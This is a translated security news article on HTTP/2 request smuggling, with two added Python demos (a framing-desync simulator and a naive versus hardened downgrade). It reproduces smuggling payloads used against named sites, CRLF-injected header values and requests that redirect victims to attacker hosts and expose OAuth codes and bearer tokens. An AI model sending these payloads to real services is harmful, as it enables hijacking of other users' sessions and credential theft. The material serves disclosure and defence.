A new attack on front-end/back-end web systems that allows wedging into other users' requests

Web systems in which the front end accepts HTTP/2 connections and forwards them to a back end over HTTP/1.1 have turned out to be exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted client requests, an attacker can wedge into the contents of requests from other users that are processed over the same front-end-to-back-end connection. The attack can be used to inject malicious JavaScript into a session with a legitimate site, to bypass access-control systems and to intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery networks and other configurations in which requests are relayed in a front-end/back-end scheme. The author of the research demonstrated attacks against systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received $56,000 in rewards from bug bounty programs. The problem was also confirmed in F5 Networks products. It partially affects mod_proxy in the Apache HTTP server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified in early May and given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers at the same time was blocked in the latest release (1.21.1). Tooling for the attack has already been added to Burp Suite and is available in the form of the Turbo Intruder extension.

The principle of the new method of wedging into request traffic is similar to the vulnerability identified by the same researcher two years ago, which was limited to front ends accepting HTTP/1.1 requests. Recall that in a front-end/back-end scheme, client requests are received by an additional node, the front end, which maintains a long-lived TCP connection to the back end that actually processes the requests. Requests from different users are usually transmitted over this shared connection one after another, separated from each other only by the framing rules of the HTTP protocol.

The classic "HTTP Request Smuggling" attack relies on the front end and the back end interpreting the HTTP headers "Content-Length" (which gives the total size of the request body) and "Transfer-Encoding: chunked" (which allows the body to be transferred in pieces) differently. For example, if the front end honours only "Content-Length" and ignores "Transfer-Encoding: chunked", an attacker can send a request carrying both headers, with a "Content-Length" value that does not match the size of the chunked body. The front end then frames and forwards the request according to "Content-Length", while the back end looks for the end of the chunked body according to "Transfer-Encoding: chunked"; the remaining tail of the attacker's request becomes the beginning of whatever request, belonging to someone else, is forwarded next.
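
The framing disagreement just described, as an added example that is not from the article: a toy HTTP/1.1 framer in Python that consumes the same byte stream twice, once the way a Content-Length-only front end would and once the way a back end that lets "Transfer-Encoding: chunked" win would. The request bytes, the hostnames and the paths are constructed for the demonstration; the `framing_is_ambiguous` check models the rule nginx 1.21.1 applies of refusing requests that carry both framing headers.

```python
# Added example (not from the article): a toy HTTP/1.1 framer that shows how a
# front end framing on Content-Length and a back end framing on
# Transfer-Encoding: chunked split the same byte stream differently, so the
# tail of an attacker's request becomes the start of the next user's request.
# All request bytes, hosts and paths below are constructed for the demo.

CRLF = b"\r\n"


def parse_head(stream):
    """Split one request head off the stream.

    Returns (headers, rest); headers is None when the head is incomplete.
    Header names are lower-cased; the request line is kept under "request-line".
    """
    end = stream.find(CRLF + CRLF)
    if end < 0:
        return None, stream
    lines = stream[:end].split(CRLF)
    headers = {"request-line": lines[0].decode("latin-1")}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, stream[end + 4:]


def read_chunked(rest):
    """Decode a chunked body; return (body, bytes left over after the 0 chunk)."""
    body = b""
    while True:
        size_end = rest.find(CRLF)
        size = int(rest[:size_end].split(b";")[0].decode("latin-1"), 16)
        rest = rest[size_end + 2:]
        if size == 0:
            # last-chunk: skip the CRLF that terminates the (empty) trailer section
            return body, (rest[2:] if rest.startswith(CRLF) else rest)
        body += rest[:size]
        rest = rest[size + 2:]          # drop the chunk data and its CRLF


def framing_is_ambiguous(headers):
    """Both framing headers present: the condition nginx 1.21.1 rejects outright."""
    return "content-length" in headers and "transfer-encoding" in headers


def split_requests(stream, prefer_chunked):
    """Frame a byte stream into (headers, body) pairs.

    prefer_chunked=False models a front end that only honours Content-Length;
    prefer_chunked=True models a back end that lets Transfer-Encoding win.
    """
    requests = []
    while stream:
        headers, rest = parse_head(stream)
        if headers is None:
            break                        # incomplete head: wait for more bytes
        if prefer_chunked and headers.get("transfer-encoding", "").lower() == "chunked":
            body, stream = read_chunked(rest)
        else:
            n = int(headers.get("content-length", "0"))
            body, stream = rest[:n], rest[n:]
        requests.append((headers, body))
    return requests


# Attacker's request: Content-Length covers 32 bytes, but the chunked body ends
# after "0\r\n\r\n", leaving "GET /admin HTTP/1.1\r\nFoo: x" unconsumed.
ATTACKER = (
    b"POST / HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Length: 32\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"Foo: x"
)
# The next request on the shared connection belongs to an unrelated user.
VICTIM = b"GET /victim HTTP/1.1\r\nHost: shop.example\r\n\r\n"
STREAM = ATTACKER + VICTIM


def request_lines(stream, prefer_chunked):
    """Request lines each side believes it saw on the connection."""
    return [h["request-line"] for h, _ in split_requests(stream, prefer_chunked)]


if __name__ == "__main__":
    print("front end:", request_lines(STREAM, prefer_chunked=False))
    print("back end: ", request_lines(STREAM, prefer_chunked=True))
    smuggled = split_requests(STREAM, prefer_chunked=True)[1][0]
    print("victim's request line swallowed into a header:", smuggled["foo"])
```

The front end sees two requests, POST / and GET /victim. The back end sees POST / with an empty body followed by GET /admin, and the victim's entire request line ends up inside the attacker's "Foo" header, which is exactly why the response to the victim will be the response to the attacker's smuggled prefix.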

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol that operates on frames of explicitly declared size. Its header fields, however, are carried as binary-encoded name/value pairs (plus pseudo-headers such as :method, :path and :authority) that correspond to the usual HTTP headers. When the front end talks to the back end over HTTP/1.1, it translates these fields into the equivalent HTTP/1.1 header lines. The problem is that the back end then makes its framing decisions based on the headers written by the front end, without any knowledge of the framing of the original HTTP/2 request.

In particular, "content-length" and "transfer-encoding" fields can be sent in an HTTP/2 request even though they serve no purpose there, since the size of the body is already fixed by the frames themselves. Yet when the HTTP/2 request is converted to HTTP/1.1, these fields are carried over and can confuse the back end. There are two main variants of the attack, H2.TE and H2.CL, in which the back end is misled by a transfer-encoding or content-length value that does not match the actual size of the body the front end received over HTTP/2.


An example of the H2.CL attack is specifying an incorrect value in the content-length field of an HTTP/2 request sent to Netflix. Such a request results in an equivalent Content-Length HTTP header being added when the back end is accessed over HTTP/1.1, but since the declared Content-Length is smaller than the actual body, part of the trailing data is processed as the beginning of the next request.

For example, the HTTP/2 request:

    :method     POST
    :path       /n
    :authority  www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

results in the following request being sent to the back end:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length is 4, the back end accepts only "abcd" as the request body, and the rest, "GET /n HTTP/1.1...", is processed as the beginning of the next request, which belongs to another user. The stream is thus desynchronized, and the response to that user's request is actually the result of processing the attacker's dummy request. In the Netflix case, specifying a third-party host in the "Host" header of the dummy request caused the client to receive a "Location: https://02.rs?x.netflix.com/n" redirect, which allowed arbitrary content to be delivered to the client, including JavaScript executing in the context of the Netflix site.

The second variant of the attack (H2.TE) relies on injecting a "Transfer-Encoding: chunked" header. The HTTP/2 specification forbids the transfer-encoding field, and requests containing it are supposed to be treated as malformed. Nevertheless, some front-end implementations ignore this requirement, accept a transfer-encoding field in HTTP/2 and convert it into the equivalent HTTP header. When a "Transfer-Encoding" header is present, the back end may give it priority and parse the body in "chunked" mode, as a sequence of blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n...0\r\n\r\n", regardless of the total-size framing the front end relied on.

The existence of such a gap was demonstrated using Verizon as an example. The problem concerned the authentication portal and content management system that is also used by sites such as the Huffington Post and Engadget. For example, the client's HTTP/2 request:

    :method     POST
    :path       /identitfy/XUI
    :authority  id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

resulted in the following HTTP/1.1 request being sent to the back end:

    POST /identitfy/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The back end, in turn, ignored the "Content-Length" header and framed the body according to "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect other users' requests to the attacker's site, including intercepting requests related to OAuth authentication (whose parameters were exposed in the Referer header), as well as imitating an authentication session and inducing the user's client to send its credentials to the attacker's host:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…

To attack HTTP/2 implementations that do not accept a transfer-encoding field, another method was proposed: the "Transfer-Encoding" header is injected by appending it to the value of some other header field, separated by a newline. When the request is converted to HTTP/1.1, the single field turns into two separate HTTP header lines.

For example, Atlassian Jira and Netlify CDN (which serves the start page of Mozilla Firefox) were affected by this problem. In particular, the HTTP/2 request (with "\r\n" marking the line breaks embedded in the field value):

    :method     POST
    :path       /
    :authority  start.mozilla.org
    foo         b\r\ntransfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

resulted in the following HTTP/1.1 request being sent to the back end:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another way of injecting the "Transfer-Encoding" header was to append it to the name of a header field or to the request method. For example, when accessing Atlassian Jira, a field named "foo:bar\r\ntransfer-encoding" with the value "chunked" caused the HTTP headers "foo:bar" and "transfer-encoding: chunked" to be added, and a ":method" pseudo-header with the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" was translated into the request line "GET / HTTP/1.1" followed by the header "transfer-encoding: chunked".
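
The HTTP/2-to-HTTP/1.1 downgrade at the heart of the H2.CL, H2.TE and header-injection variants described above, as an added example that is not code from the article or from any of the affected vendors: a toy downgrade step in Python. `downgrade_naive` copies the client's framing fields and header bytes through verbatim, which is the behaviour all three variants exploit; `downgrade_hardened` derives the framing from the body the frames actually delivered and rejects anything that could splice in an extra header line. The header maps, hostnames and bodies are constructed and loosely modelled on the article's three cases; no HPACK decoding or real frames are involved.

```python
import re

# Added example (not from the article or any vendor): a toy HTTP/2 -> HTTP/1.1
# downgrade, the front-end step that rebuilds a text request from binary header
# fields. Header maps, hosts and bodies are constructed for the demonstration.

PSEUDO = {":method", ":path", ":authority", ":scheme"}
TOKEN = re.compile(r"[!#$%&'*+.^_`|~0-9A-Za-z-]+")   # RFC 9110 token characters


class DowngradeError(ValueError):
    """Raised when a request must be rejected instead of forwarded."""


def _request_line(h2):
    return f"{h2[':method']} {h2[':path']} HTTP/1.1"


def downgrade_naive(h2, body):
    """Vulnerable: trusts every client-supplied field.

    A client content-length is copied even if it disagrees with the body the
    DATA frames delivered (H2.CL); transfer-encoding is copied although HTTP/2
    forbids it (H2.TE); CR/LF inside a name or value is written out as-is, so
    one field can become two header lines (header-injection variant).
    """
    lines = [_request_line(h2), f"Host: {h2[':authority']}"]
    lines += [f"{n}: {v}" for n, v in h2.items() if n not in PSEUDO]
    if "content-length" not in h2:
        lines.append(f"Content-Length: {len(body)}")   # front end frames the body
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def downgrade_hardened(h2, body):
    """Rebuild the request so the back end can only ever see one framing."""
    for name, value in h2.items():
        if name not in PSEUDO and not TOKEN.fullmatch(name):
            raise DowngradeError(f"illegal header name {name!r}")
        if any(c in value for c in "\r\n\0") or (name in PSEUDO and " " in value):
            raise DowngradeError(f"illegal characters in field {name!r}")
    if "transfer-encoding" in h2:
        # RFC 9113 s8.2.2: connection-specific fields make the request malformed
        raise DowngradeError("transfer-encoding is not allowed in HTTP/2")
    declared = h2.get("content-length")
    if declared is not None and declared != str(len(body)):
        # RFC 9113 s8.1.1: content-length must equal the DATA frame payload size
        raise DowngradeError(f"content-length {declared} != body {len(body)}")
    lines = [_request_line(h2), f"Host: {h2[':authority']}"]
    lines += [f"{n}: {v}" for n, v in h2.items()
              if n not in PSEUDO and n != "content-length"]
    lines.append(f"Content-Length: {len(body)}")      # the only framing header
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def safe_to_forward(h2, body):
    """True if the hardened downgrade accepts the request."""
    try:
        downgrade_hardened(h2, body)
        return True
    except DowngradeError:
        return False


def header_lines(raw):
    """Header lines the back end would see in a downgraded request."""
    return raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")


# Constructed cases modelled on the three variants described in the article.
SMUGGLED = b"GET /oops HTTP/1.1\r\nHost: attacker.example\r\nContent-Length: 10\r\n\r\nx="
CASES = {
    # H2.CL: client declares 4 bytes, the DATA frames carried far more
    "h2cl": ({":method": "POST", ":path": "/n", ":authority": "app.example",
              "content-length": "4"}, b"abcd" + SMUGGLED),
    # H2.TE: forbidden transfer-encoding field copied into HTTP/1.1
    "h2te": ({":method": "POST", ":path": "/login", ":authority": "app.example",
              "transfer-encoding": "chunked"}, b"0\r\n\r\n" + SMUGGLED),
    # CRLF in a value: one HTTP/2 field becomes two HTTP/1.1 header lines
    "crlf": ({":method": "POST", ":path": "/", ":authority": "app.example",
              "foo": "b\r\ntransfer-encoding: chunked"}, b"0\r\n\r\n" + SMUGGLED),
    # ordinary request: both downgrades produce identical bytes
    "benign": ({":method": "POST", ":path": "/login", ":authority": "app.example",
                "content-type": "application/x-www-form-urlencoded"}, b"user=alice"),
}

if __name__ == "__main__":
    for label, (h2, body) in CASES.items():
        print(label, "naive headers:", header_lines(downgrade_naive(h2, body)))
        print(label, "hardened accepts:", safe_to_forward(h2, body))
```

For the three attack cases the naive downgrade emits exactly the header blocks the article shows (a stale Content-Length, a Transfer-Encoding next to a recomputed Content-Length, or a "foo" line followed by an injected "transfer-encoding: chunked" line), while the hardened version rejects all of them and forwards only the benign request. Rejecting rather than silently dropping a bad content-length matters: a client whose declared length disagrees with its frames is already misbehaving, and the safest response is a stream error, not a guess.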

The researcher who identified the problem also proposed a request tunnelling technique for attacking front ends that open a separate back-end connection per client IP address, so that traffic from different users is never mixed. This technique does not allow wedging into other users' requests, but it does make it possible to poison a shared cache, affecting how other requests are served, and to spoof internal HTTP headers that the front end uses to pass service information to the back end (for example, when authentication is performed on the front end, such headers may carry information about the current user to the back end). As a practical demonstration of the method, cache poisoning was used to gain control over pages of the Bitbucket service.

Source: opennet.ru
